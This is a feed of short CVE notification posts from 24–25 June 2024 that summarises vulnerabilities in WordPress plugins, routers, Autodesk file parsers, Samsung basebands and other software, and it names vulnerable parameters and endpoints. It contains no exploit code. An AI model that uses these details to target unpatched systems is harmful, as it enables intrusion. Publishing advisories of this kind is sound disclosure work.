🚨 CVE-2024-4884In WhatsUp Gold versions released before 2023.1.3, an unauthenticated Remote Code Execution vulnerability in Progress WhatsUpGold. The Apm.UI.Areas.APM.Controllers.CommunityController allows execution of commands with iisapppool\nmconsole privileges.🎖@cveNotify |
|
| 2024-06-25 20:37:31 |
🚨 CVE-2024-4498A Path Traversal and Remote File Inclusion (RFI) vulnerability exists in the parisneo/lollms-webui application, affecting versions v9.7 to the latest. The vulnerability arises from insufficient input validation in the `/apply_settings` function, allowing an attacker to manipulate the `discussion_db_name` parameter to traverse the file system and include arbitrary files. This issue is compounded by the bypass of input filtering in the `install_binding`, `reinstall_binding`, and `unInstall_binding` endpoints, despite the presence of a `sanitize_path_from_endpoint(data.name)` filter. Successful exploitation enables an attacker to upload and execute malicious code on the victim's system, leading to Remote Code Execution (RCE).🎖@cveNotify |
|
| 2024-06-25 20:37:30 |
🚨 CVE-2024-37167Tuleap is an Open Source Suite to improve management of software developments and collaboration. Users are able to see backlog items that they should not see. This issue has been patched in Tuleap Community Edition version 15.9.99.97.🎖@cveNotify |
|
| 2024-06-25 20:37:26 |
🚨 CVE-2023-50804An issue was discovered in Samsung Mobile Processor, and Modem Exynos 9820, Exynos 9825, Exynos 980, Exynos 990, Exynos 850, Exynos 1080, Exynos 2100, Exynos 2200, Exynos 1280, Exynos 1380, Exynos 1330, Exynos Modem 5123, Exynos Modem 5300. The baseband software does not properly check format types specified by the NAS (Non-Access-Stratum) module. This can lead to bypass of authentication.🎖@cveNotify |
|
| 2024-06-25 20:37:25 |
🚨 CVE-2024-29152An issue was discovered in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, Exynos 990, Exynos 1080, Exynos 2100, Exynos 2200, Exynos 1280, Exynos 1380, Exynos 1330, Exynos 2400, Exynos Modem 5123, and Exynos Modem 5300. The baseband software does not properly check states specified by the RRC (Radio Resource Control) Reconfiguration message. This can lead to disclosure of sensitive information.🎖@cveNotify |
|
| 2024-06-25 20:37:24 |
🚨 CVE-2023-51219A deep link validation issue in KakaoTalk 10.4.3 allowed a remote adversary to direct users to run any attacker-controlled JavaScript within a WebView. The impact was further escalated by triggering another WebView that leaked its access token in a HTTP request header. Ultimately, this access token could be used to take over another user's account and read her/his chat messages.🎖@cveNotify |
|
| 2024-06-25 19:37:25 |
🚨 CVE-2024-37820A nil pointer dereference in PingCAP TiDB v8.2.0-alpha-216-gfe5858b allows attackers to crash the application via expression.inferCollation.🎖@cveNotify |
|
| 2024-06-25 19:37:24 |
🚨 CVE-2024-36819MAP-OS 4.45.0 and earlier is vulnerable to Cross-Site Scripting (XSS). This vulnerability allows malicious users to insert a malicious payload into the "Client Name" input. When a service order from this client is created, the malicious payload is displayed on the administrator and employee dashboards, resulting in unauthorized script execution whenever the dashboard is loaded.🎖@cveNotify |
|
| 2024-06-25 19:07:30 |
🚨 CVE-2024-6301Lack of validation of origin in federation API in Conduit, allowing any remote server to impersonate any user from any server in most EDUs🎖@cveNotify |
|
| 2024-06-25 19:07:26 |
🚨 CVE-2024-6299Lack of consideration of key expiry when validating signatures in Conduit, allowing an attacker which has compromised an expired key to forge requests as the remote server, as well as PDUs with timestamps past the expiry date🎖@cveNotify |
|
| 2024-06-25 19:07:25 |
🚨 CVE-2024-4846Authentication bypass in the 2FA feature in Devolutions Server 2024.1.14.0 and earlier allows an authenticated attacker to authenticate to another user without being asked for the 2FA via another browser tab.🎖@cveNotify |
|
| 2024-06-25 19:07:24 |
🚨 CVE-2024-31111Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Automattic WordPress allows Stored XSS.This issue affects WordPress: from 6.5 through 6.5.4, from 6.4 through 6.4.4, from 6.3 through 6.3.4, from 6.2 through 6.2.5, from 6.1 through 6.1.6, from 6.0 through 6.0.8, from 5.9 through 5.9.9.🎖@cveNotify |
|
| 2024-06-25 18:37:25 |
🚨 CVE-2024-6115A vulnerability classified as critical was found in itsourcecode Simple Online Hotel Reservation System 1.0. Affected by this vulnerability is an unknown functionality of the file add_room.php. The manipulation of the argument photo leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-268867.🎖@cveNotify |
|
| 2024-06-25 18:37:24 |
🚨 CVE-2024-6108A vulnerability was found in Genexis Tilgin Home Gateway 322_AS0500-03_05_13_05. It has been classified as problematic. Affected is an unknown function of the file /vood/cgi-bin/vood_view.cgi?act=index&lang=EN# of the component Login. The manipulation of the argument errmsg leads to basic cross site scripting. It is possible to launch the attack remotely. VDB-268854 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-06-25 16:37:30 |
🚨 CVE-2024-5990Due to an improper input validation, an unauthenticated threat actor can send a malicious message to a monitor thread within Rockwell Automation ThinServer™ and cause a denial-of-service condition on the affected device.🎖@cveNotify |
|
| 2024-06-25 16:37:26 |
🚨 CVE-2024-5989Due to an improper input validation, an unauthenticated threat actor can send a malicious message to invoke SQL injection into the program and cause a remote code execution condition on the Rockwell Automation ThinManager® ThinServer™.🎖@cveNotify |
|
| 2024-06-25 16:37:25 |
🚨 CVE-2024-6275A vulnerability classified as critical was found in lahirudanushka School Management System 1.0.0/1.0.1. This vulnerability affects unknown code of the file parent.php of the component Parent Page. The manipulation of the argument update leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-269488.🎖@cveNotify |
|
| 2024-06-25 16:37:24 |
🚨 CVE-2024-6189A vulnerability was found in Tenda A301 15.13.08.12. It has been classified as critical. Affected is the function fromSetWirelessRepeat of the file /goform/WifiExtraSet. The manipulation of the argument wpapsk_crypto leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-269160. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-06-25 15:37:26 |
🚨 CVE-2024-21827A leftover debug code vulnerability exists in the cli_server debug functionality of Tp-Link ER7206 Omada Gigabit VPN Router 1.4.1 Build 20240117 Rel.57421. A specially crafted series of network requests can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger this vulnerability.🎖@cveNotify |
|
| 2024-06-25 14:37:30 |
🚨 CVE-2024-5451The The7 — Website and eCommerce Builder for WordPress theme for WordPress is vulnerable to Stored Cross-Site Scripting via the 'url' attribute within the plugin's Icon and Heading widgets in all versions up to, and including, 11.13.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-25 14:37:26 |
🚨 CVE-2024-38952PX4-Autopilot v1.14.3 was discovered to contain a buffer overflow via the topic_name parameter at /logger/logged_topics.cpp.🎖@cveNotify |
|
| 2024-06-25 14:37:25 |
🚨 CVE-2024-21827A leftover debug code vulnerability exists in the cli_server debug functionality of Tp-Link ER7206 Omada Gigabit VPN Router 1.4.1 Build 20240117 Rel.57421. A specially crafted series of network requests can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger this vulnerability.🎖@cveNotify |
|
| 2024-06-25 14:37:24 |
🚨 CVE-2023-49115MachineSense devices use unauthenticated MQTT messaging to monitor devices and remote viewing of sensor data by users.🎖@cveNotify |
|
| 2024-06-25 13:37:50 |
🚨 CVE-2024-6301Lack of validation of origin in federation API in Conduit, allowing any remote server to impersonate any user from any server in most EDUs🎖@cveNotify |
|
| 2024-06-25 13:37:49 |
🚨 CVE-2024-6300Incomplete cleanup when performing redactions in Conduit, allowing an attacker to check whether certain strings were present in the PDU before redaction🎖@cveNotify |
|
| 2024-06-25 13:37:44 |
🚨 CVE-2024-5261Improper Certificate Validation vulnerability in LibreOffice "LibreOfficeKit" mode disables TLS certification verificationLibreOfficeKit can be used for accessing LibreOffice functionality through C/C++. Typically this is used by third party components to reuse LibreOffice as a library to convert, view or otherwise interact with documents.LibreOffice internally makes use of "curl" to fetch remote resources such as images hosted on webservers.In affected versions of LibreOffice, when used in LibreOfficeKit mode only, then curl's TLS certification verification was disabled (CURLOPT_SSL_VERIFYPEER of false)In the fixed versions curl operates in LibreOfficeKit mode the same as in standard mode with CURLOPT_SSL_VERIFYPEER of true.This issue affects LibreOffice before version 24.2.4.🎖@cveNotify |
|
| 2024-06-25 13:37:43 |
🚨 CVE-2024-31111Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Automattic WordPress allows Stored XSS.This issue affects WordPress: from 6.5 through 6.5.4, from 6.4 through 6.4.4, from 6.3 through 6.3.4, from 6.2 through 6.2.5, from 6.1 through 6.1.6, from 6.0 through 6.0.8, from 5.9 through 5.9.9.🎖@cveNotify |
|
| 2024-06-25 13:37:42 |
🚨 CVE-2024-6273A vulnerability was found in SourceCodester Clinic Queuing System 1.0. It has been declared as problematic. Affected by this vulnerability is the function save_patient of the file patient_side.php. The manipulation of the argument Full Name/Contact/Address leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-269485 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-06-25 12:37:42 |
🚨 CVE-2024-33898Axiros AXESS Auto Configuration Server (ACS) 4.x and 5.0.0 has Incorrect Access Control. An authorization bypass allows remote attackers to achieve unauthenticated remote code execution.🎖@cveNotify |
|
| 2024-06-25 12:37:38 |
🚨 CVE-2024-38903H3C Magic R230 V100R002's udpserver opens port 9034, allowing attackers to execute arbitrary commands.🎖@cveNotify |
|
| 2024-06-25 12:37:37 |
🚨 CVE-2024-38897WAVLINK WN551K1'live_check.shtml enables attackers to obtain sensitive router information.🎖@cveNotify |
|
| 2024-06-25 12:37:36 |
🚨 CVE-2024-38896WAVLINK WN551K1 found a command injection vulnerability through the start_hour parameter of /cgi-bin/nightled.cgi.🎖@cveNotify |
|
| 2024-06-25 12:37:32 |
🚨 CVE-2024-38894WAVLINK WN551K1 found a command injection vulnerability through the IP parameter of /cgi-bin/touchlist_sync.cgi.🎖@cveNotify |
|
| 2024-06-25 12:37:31 |
🚨 CVE-2024-37759DataGear v5.0.0 and earlier was discovered to contain a SpEL (Spring Expression Language) expression injection vulnerability via the Data Viewing interface.🎖@cveNotify |
|
| 2024-06-25 12:37:30 |
🚨 CVE-2023-45196Adminer and AdminerEvo allow an unauthenticated remote attacker to cause a denial of service by connecting to an attacker-controlled service that responds with HTTP redirects. The denial of service is subject to PHP configuration limits. Adminer is no longer supported, but this issue was fixed in AdminerEvo version 4.8.4.🎖@cveNotify |
|
| 2024-06-25 12:37:27 |
🚨 CVE-2024-37681An issue the background management system of Shanxi Internet Chuangxiang Technology Co., Ltd v1.0.1 allows a remote attacker to cause a denial of service via the index.html component.🎖@cveNotify |
|
| 2024-06-25 12:37:26 |
🚨 CVE-2024-34313An issue in VPL Jail System up to v4.0.2 allows attackers to execute a directory traversal via a crafted request to a public endpoint.🎖@cveNotify |
|
| 2024-06-25 12:37:25 |
🚨 CVE-2023-5037badmonkey, a Security Researcher has found a flaw that allows for a authenticated command injection on the camera. An attacker could inject malicious into request packets to execute command. The manufacturer has released patch firmware for the flaw, please refer to the manufacturer's report for details and workarounds.🎖@cveNotify |
|
| 2024-06-25 11:37:26 |
🚨 CVE-2024-6306WordPress Core is vulnerable to Directory Traversal in various versions up to 6.5.5 via the Template Part block. This makes it possible for authenticated attackers, with Contributor-level access and above, to include arbitrary HTML Files on sites running Windows.🎖@cveNotify |
|
| 2024-06-25 11:37:25 |
🚨 CVE-2024-5216A vulnerability in mintplex-labs/anything-llm allows for a Denial of Service (DoS) condition due to uncontrolled resource consumption. Specifically, the issue arises from the application's failure to limit the size of usernames, enabling attackers to create users with excessively bulky texts in the username field. This exploit results in the user management panel becoming unresponsive, preventing administrators from performing critical user management actions such as editing, suspending, or deleting users. The impact of this vulnerability includes administrative paralysis, compromised security, and operational disruption, as it allows malicious users to perpetuate their presence within the system indefinitely, undermines the system's security posture, and degrades overall system performance.🎖@cveNotify |
|
| 2024-06-25 11:37:24 |
🚨 CVE-2024-2965A Denial-of-Service (DoS) vulnerability exists in the `SitemapLoader` class of the `langchain-community` package, affecting all versions. The `parse_sitemap` method, responsible for parsing sitemaps and extracting URLs, lacks a mechanism to prevent infinite recursion when a sitemap URL refers to the current sitemap itself. This oversight allows for the possibility of an infinite loop, leading to a crash by exceeding the maximum recursion depth in Python. This vulnerability can be exploited to occupy server socket/port resources and crash the Python process, impacting the availability of services relying on this functionality.🎖@cveNotify |
|
| 2024-06-25 10:37:28 |
🚨 CVE-2024-4640OnCell G3470A-LTE Series firmware versions v1.7.7 and prior have been identified as vulnerable due to missing bounds checking on buffer operations. An attacker could write past the boundaries of allocated buffer regions in memory, causing a program crash.🎖@cveNotify |
|
| 2024-06-25 10:37:27 |
🚨 CVE-2024-4639OnCell G3470A-LTE Series firmware versions v1.7.7 and prior have been identified as vulnerable due to a lack of neutralized inputs in IPSec configuration. An attacker could modify the intended commands sent to target functions, which could cause malicious users to execute unauthorized commands.🎖@cveNotify |
|
| 2024-06-25 09:37:35 |
🚨 CVE-2024-6028The Quiz Maker plugin for WordPress is vulnerable to time-based SQL Injection via the 'ays_questions' parameter in all versions up to, and including, 6.5.8.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-06-25 09:37:34 |
🚨 CVE-2024-34141Adobe Experience Manager versions 6.5.20 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.🎖@cveNotify |
|
| 2024-06-25 07:37:24 |
🚨 CVE-2024-3249The Zita Elementor Site Library plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the import_xml_data, xml_data_import, import_option_data, import_widgets, and import_customizer_settings functions in all versions up to, and including, 1.6.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to create pages, update certain options, including WooCommerce page titles and Elementor settings, import widgets, and update the plugin's customizer settings and the WordPress custom CSS. NOTE: This vulnerability was partially fixed in version 1.6.2.🎖@cveNotify |
|
| 2024-06-25 06:37:30 |
🚨 CVE-2024-5431The WPCafe – Online Food Ordering, Restaurant Menu, Delivery, and Reservations for WooCommerce plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.2.25 via the reservation_extra_field shortcode parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, to include remote files on the server, potentially resulting in code execution🎖@cveNotify |
|
| 2024-06-25 06:37:26 |
🚨 CVE-2024-4759The Mime Types Extended WordPress plugin through 0.11 does not sanitise uploaded SVG files, which could allow users with a role as low as Author to upload a malicious SVG containing XSS payloads.🎖@cveNotify |
|
| 2024-06-25 06:37:25 |
🚨 CVE-2024-36496The configuration file is encrypted with a static key derived from a static five-character password which allows an attacker to decrypt this file. The application hashes this five-character password with the outdated and broken MD5 algorithm (no salt) and uses the first five bytes as the key for RC4. The configuration file is then encrypted with these parameters.🎖@cveNotify |
|
| 2024-06-25 06:37:24 |
🚨 CVE-2024-36495The application Faronics WINSelect (Standard + Enterprise) saves its configuration in an encrypted file on the file system which "Everyone" has read and write access to, path to file:C:\ProgramData\WINSelect\WINSelect.wsdThe path for the affected WINSelect Enterprise configuration file is:C:\ProgramData\Faronics\StorageSpace\WS\WINSelect.wsd🎖@cveNotify |
|
| 2024-06-25 04:37:45 |
🚨 CVE-2024-6297Several plugins for WordPress hosted on WordPress.org have been compromised and injected with malicious PHP scripts. A malicious threat actor compromised the source code of various plugins and injected code that exfiltrates database credentials and is used to create new, malicious, administrator users and send that data back to a server. Currently, not all plugins have been patched and we strongly recommend uninstalling the plugins for the time being and running a complete malware scan.🎖@cveNotify |
|
| 2024-06-25 04:37:44 |
🚨 CVE-2024-4196An improper input validation vulnerability was discovered in Avaya IP Office that could allow remote command or code execution via a specially crafted web request to the Web Control component. Affected versions include all versions prior to 11.1.3.1.🎖@cveNotify |
|
| 2024-06-25 04:37:43 |
🚨 CVE-2024-37006A maliciously crafted CATPRODUCT file, when parsed in CC5Dll.dll through Autodesk applications, can lead to a memory corruption vulnerability by write access violation. This vulnerability, in conjunction with other vulnerabilities, can lead to code execution in the context of the current process.🎖@cveNotify |
|
| 2024-06-25 04:37:39 |
🚨 CVE-2024-37003A maliciously crafted DWG and SLDPRT file, when parsed in opennurbs.dll and ODXSW_DLL.dll through Autodesk applications, can be used to cause a Stack-based Overflow. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process.🎖@cveNotify |
|
| 2024-06-25 04:37:38 |
🚨 CVE-2024-32855Dell Client Platform BIOS contains an Out-of-bounds Write vulnerability in an externally developed component. A high privileged attacker with local access could potentially exploit this vulnerability, leading to Information tampering.🎖@cveNotify |
|
| 2024-06-25 04:37:34 |
🚨 CVE-2024-23158A maliciously crafted IGES file, when parsed in ASMImport229A.dll through Autodesk applications, can be used to cause a use-after-free vulnerability. A malicious actor can leverage this vulnerability to cause a crash or execute arbitrary code in the context of the current process.🎖@cveNotify |
|
| 2024-06-25 04:37:33 |
🚨 CVE-2024-23156A maliciously crafted 3DM file, when parsed in opennurbs.dll and ASMkern229A.dll through Autodesk applications, can lead to a memory corruption vulnerability by write access violation. This vulnerability, along with other vulnerabilities, can lead to code execution in the current process.🎖@cveNotify |
|
| 2024-06-25 04:37:32 |
🚨 CVE-2024-23155A maliciously crafted MODEL file, when parsed in atf_asm_interface.dll through Autodesk applications, can be used to cause a Heap-based Buffer Overflow. A malicious actor can leverage this vulnerability to cause a crash or execute arbitrary code in the context of the current process.🎖@cveNotify |
|
| 2024-06-25 04:37:28 |
🚨 CVE-2024-23153A maliciously crafted MODEL file, when parsed in libodx.dll through Autodesk applications, can force an Out-of-Bounds Read. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process.🎖@cveNotify |
|
| 2024-06-25 04:37:27 |
🚨 CVE-2024-23151A maliciously crafted 3DM file, when parsed in ASMkern229A.dll through Autodesk applications, can force an Out-of-Bounds Write. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process.🎖@cveNotify |
|
| 2024-06-25 04:37:26 |
🚨 CVE-2024-23150A maliciously crafted PRT file, when parsed in odxug_dll.dll through Autodesk applications, can force an Out-of-Bounds Write. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process.🎖@cveNotify |
|
| 2024-06-25 03:37:31 |
🚨 CVE-2024-37001[A maliciously crafted 3DM file, when parsed in opennurbs.dll through Autodesk applications, can be used to cause a Heap-based Overflow. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process.🎖@cveNotify |
|
| 2024-06-25 03:37:30 |
🚨 CVE-2024-23149A maliciously crafted SLDDRW file, when parsed in ODXSW_DLL.dll through Autodesk applications, can force an Out-of-Bound Read. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process.🎖@cveNotify |
|
| 2024-06-25 03:37:26 |
🚨 CVE-2024-23147A maliciously crafted CATPART, X_B and STEP, when parsed in ASMKERN228A.dll and ASMKERN229A.dll through Autodesk applications, can lead to a memory corruption vulnerability by write access violation. This vulnerability, in conjunction with other vulnerabilities, can lead to code execution in the context of the current process.🎖@cveNotify |
|
| 2024-06-25 03:37:25 |
🚨 CVE-2023-5038badmonkey, a Security Researcher has found a flaw that allows for a unauthenticated DoS attack on the camera. An attacker runs a crafted URL, nobody can access the web management page of the camera. and must manually restart the device or re-power it. The manufacturer has released patch firmware for the flaw, please refer to the manufacturer's report for details and workarounds.🎖@cveNotify |
|
| 2024-06-25 02:37:39 |
🚨 CVE-2024-23144A maliciously crafted CATPART file, when parsed in CC5Dll.dll and ASMBASE228A.dll through Autodesk applications, can force an Out-of-Bound Write. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process.🎖@cveNotify |
|
| 2024-06-25 02:37:34 |
🚨 CVE-2024-23142A maliciously crafted CATPART, STP, and MODEL file, when parsed in atf_dwg_consumer.dll, rose_x64_vc15.dll and libodxdll through Autodesk applications, can cause a use-after-free vulnerability. This vulnerability, along with other vulnerabilities, can lead to code execution in the current process.🎖@cveNotify |
|
| 2024-06-25 02:37:33 |
🚨 CVE-2024-22385Incorrect Default Permissions vulnerability in Hitachi Storage Provider for VMware vCenter allows local users to read and write specific files.This issue affects Hitachi Storage Provider for VMware vCenter: from 3.1.0 before 3.7.4.🎖@cveNotify |
|
| 2024-06-25 02:37:29 |
🚨 CVE-2023-6198Use of Hard-coded Credentials vulnerability in Baicells Snap Router BaiCE_BMI on EP3011 (User Passwords modules) allows unauthorized access to the device.🎖@cveNotify |
|
| 2024-06-25 02:37:28 |
🚨 CVE-2024-23131A maliciously crafted STP file, when parsed in ASMIMPORT229A.dll, ASMKERN228A.dll, ASMkern229A.dll or ASMDATAX228A.dll through Autodesk applications, can lead to a memory corruption vulnerability by write access violation. This vulnerability, in conjunction with other vulnerabilities, can lead to code execution in the context of the current process.🎖@cveNotify |
|
| 2024-06-25 02:37:27 |
🚨 CVE-2019-14861All Samba versions 4.x.x before 4.9.17, 4.10.x before 4.10.11 and 4.11.x before 4.11.3 have an issue, where the (poorly named) dnsserver RPC pipe provides administrative facilities to modify DNS records and zones. Samba, when acting as an AD DC, stores DNS records in LDAP. In AD, the default permissions on the DNS partition allow creation of new records by authenticated users. This is used for example to allow machines to self-register in DNS. If a DNS record was created that case-insensitively matched the name of the zone, the ldb_qsort() and dns_name_compare() routines could be confused into reading memory prior to the list of DNS entries when responding to DnssrvEnumRecords() or DnssrvEnumRecords2() and so following invalid memory as a pointer.🎖@cveNotify |
|
| 2024-06-25 01:37:40 |
🚨 CVE-2024-23130A maliciously crafted SLDASM or SLDPRT file, when parsed in ODXSW_DLL.dll through Autodesk applications, can lead to a memory corruption vulnerability by write access violation. This vulnerability, in conjunction with other vulnerabilities, can lead to code execution in the context of the current process.🎖@cveNotify |
|
| 2024-06-25 01:37:36 |
🚨 CVE-2024-23127A maliciously crafted MODEL, SLDPRT, or SLDASM file, when parsed in ODXSW_DLL.dll and libodxdll.dll through Autodesk applications, can be used to cause a Heap-based Overflow. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process.🎖@cveNotify |
|
| 2024-06-25 01:37:35 |
🚨 CVE-2024-23122A maliciously crafted 3DM file, when parsed in opennurbs.dll through Autodesk applications, can force an Out-of-Bound Write. A malicious actor can leverage this vulnerability to cause a crash, read sensitive data, or execute arbitrary code in the context of the current process.🎖@cveNotify |
|
| 2024-06-24 23:37:25 |
🚨 CVE-2023-50029PHP Injection vulnerability in the module "M4 PDF Extensions" (m4pdf) up to version 3.3.2 from PrestaAddons for PrestaShop allows attackers to run arbitrary code via the M4PDF::saveTemplate() method.🎖@cveNotify |
|
| 2024-06-24 23:37:24 |
🚨 CVE-2024-22167A potential DLL hijacking vulnerability in the SanDisk PrivateAccess application for Windows that could lead to arbitrary code execution in the context of the system user. This vulnerability is only exploitable locally if an attacker has access to a copy of the user's vault or has already gained access into a user's system. This attack is limited to the system in context and cannot be propagated.🎖@cveNotify |
|
| 2024-06-24 22:37:25 |
🚨 CVE-2024-33898Axiros AXESS Auto Configuration Server (ACS) 4.x and 5.0.0 has Incorrect Access Control. An authorization bypass allows remote attackers to achieve unauthenticated remote code execution.🎖@cveNotify |
|
| 2024-06-24 22:37:24 |
🚨 CVE-2023-45195Adminer and AdminerEvo are vulnerable to SSRF via database connection fields. This could allow an unauthenticated remote attacker to enumerate or access systems the attacker would not otherwise have access to. Adminer is no longer supported, but this issue was fixed in AdminerEvo version 4.8.4.🎖@cveNotify |
|
| 2024-06-24 21:37:31 |
🚨 CVE-2024-38903H3C Magic R230 V100R002's udpserver opens port 9034, allowing attackers to execute arbitrary commands.🎖@cveNotify |
|
| 2024-06-24 21:37:30 |
🚨 CVE-2024-38896WAVLINK WN551K1 found a command injection vulnerability through the start_hour parameter of /cgi-bin/nightled.cgi.🎖@cveNotify |
|
| 2024-06-24 21:37:29 |
🚨 CVE-2024-38895WAVLINK WN551K1'live_mfg.shtml enables attackers to obtain sensitive router information.🎖@cveNotify |
|
| 2024-06-24 21:37:26 |
🚨 CVE-2024-38894WAVLINK WN551K1 found a command injection vulnerability through the IP parameter of /cgi-bin/touchlist_sync.cgi.🎖@cveNotify |
|
| 2024-06-24 21:37:25 |
🚨 CVE-2023-45196Adminer and AdminerEvo allow an unauthenticated remote attacker to cause a denial of service by connecting to an attacker-controlled service that responds with HTTP redirects. The denial of service is subject to PHP configuration limits. Adminer is no longer supported, but this issue was fixed in AdminerEvo version 4.8.4.🎖@cveNotify |
|
| 2024-06-24 21:37:24 |
🚨 CVE-2023-45197The file upload plugin in Adminer and AdminerEvo allows an attacker to upload a file with a table name of “..” to the root of the Adminer directory. The attacker can effectively guess the name of the uploaded file and execute it. Adminer is no longer supported, but this issue was fixed in AdminerEvo version 4.8.3.🎖@cveNotify |
|
| 2024-06-24 21:07:26 |
🚨 CVE-2024-30075Windows Link Layer Topology Discovery Protocol Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-06-24 21:07:25 |
🚨 CVE-2024-30070DHCP Server Service Denial of Service Vulnerability🎖@cveNotify |
|
| 2024-06-24 21:07:24 |
🚨 CVE-2024-30069Windows Remote Access Connection Manager Information Disclosure Vulnerability🎖@cveNotify |
|
| 2024-06-24 20:37:32 |
🚨 CVE-2024-34313An issue in VPL Jail System up to v4.0.2 allows attackers to execute a directory traversal via a crafted request to a public endpoint.🎖@cveNotify |
|
| 2024-06-24 20:37:25 |
🚨 CVE-2024-6216A vulnerability classified as critical has been found in SourceCodester Food Ordering Management System 1.0. Affected is an unknown function of the file add-users.php. The manipulation of the argument contact leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-269280.🎖@cveNotify |
|
| 2024-06-24 20:37:24 |
🚨 CVE-2018-5389The Internet Key Exchange v1 main mode is vulnerable to offline dictionary or brute force attacks. Reusing a key pair across different versions and modes of IKE could lead to cross-protocol authentication bypasses. It is well known, that the aggressive mode of IKEv1 PSK is vulnerable to offline dictionary or brute force attacks. For the main mode, however, only an online attack against PSK authentication was thought to be feasible. This vulnerability could allow an attacker to recover a weak Pre-Shared Key or enable the impersonation of a victim host or network.🎖@cveNotify |
|
| 2024-06-24 19:37:38 |
🚨 CVE-2024-38780In the Linux kernel, the following vulnerability has been resolved:dma-buf/sw-sync: don't enable IRQ from sync_print_obj()Since commit a6aa8fca4d79 ("dma-buf/sw-sync: Reduce irqsave/irqrestore fromknown context") by error replaced spin_unlock_irqrestore() withspin_unlock_irq() for both sync_debugfs_show() and sync_print_obj() despitesync_print_obj() is called from sync_debugfs_show(), lockdep complainsinconsistent lock state warning.Use plain spin_{lock,unlock}() for sync_print_obj(), forsync_debugfs_show() is already using spin_{lock,unlock}_irq().🎖@cveNotify |
|
| 2024-06-24 19:37:37 |
🚨 CVE-2024-6225The Booking for Appointments and Events Calendar – Amelia plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.1.5 (and 7.5.1 for the Pro version) due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.🎖@cveNotify |
|
| 2024-06-24 19:37:36 |
🚨 CVE-2024-5945The WP SVG Images plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘type’ parameter in all versions up to, and including, 4.2 due to insufficient input sanitization. This makes it possible for authenticated attackers, with Author-level access and above, who have permissions to upload sanitized files, to bypass SVG sanitization and inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-06-24 19:37:33 |
🚨 CVE-2024-5639The User Profile Picture plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.6.1 via the 'rest_api_change_profile_image' function due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Author-level access and above, to update the profile picture of any user.🎖@cveNotify |
|
| 2024-06-24 19:37:32 |
🚨 CVE-2024-5448The PayPal Pay Now, Buy Now, Donation and Cart Buttons Shortcode WordPress plugin through 1.7 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks🎖@cveNotify |
|
| 2024-06-24 19:37:31 |
🚨 CVE-2024-4970The Widget Bundle WordPress plugin through 2.0.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-06-24 19:37:26 |
🚨 CVE-2024-4755The Google CSE WordPress plugin through 1.0.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-06-24 19:37:25 |
🚨 CVE-2018-5389The Internet Key Exchange v1 main mode is vulnerable to offline dictionary or brute force attacks. Reusing a key pair across different versions and modes of IKE could lead to cross-protocol authentication bypasses. It is well known, that the aggressive mode of IKEv1 PSK is vulnerable to offline dictionary or brute force attacks. For the main mode, however, only an online attack against PSK authentication was thought to be feasible. This vulnerability could allow an attacker to recover a weak Pre-Shared Key or enable the impersonation of a victim host or network.🎖@cveNotify |
|
| 2024-06-24 19:07:40 |
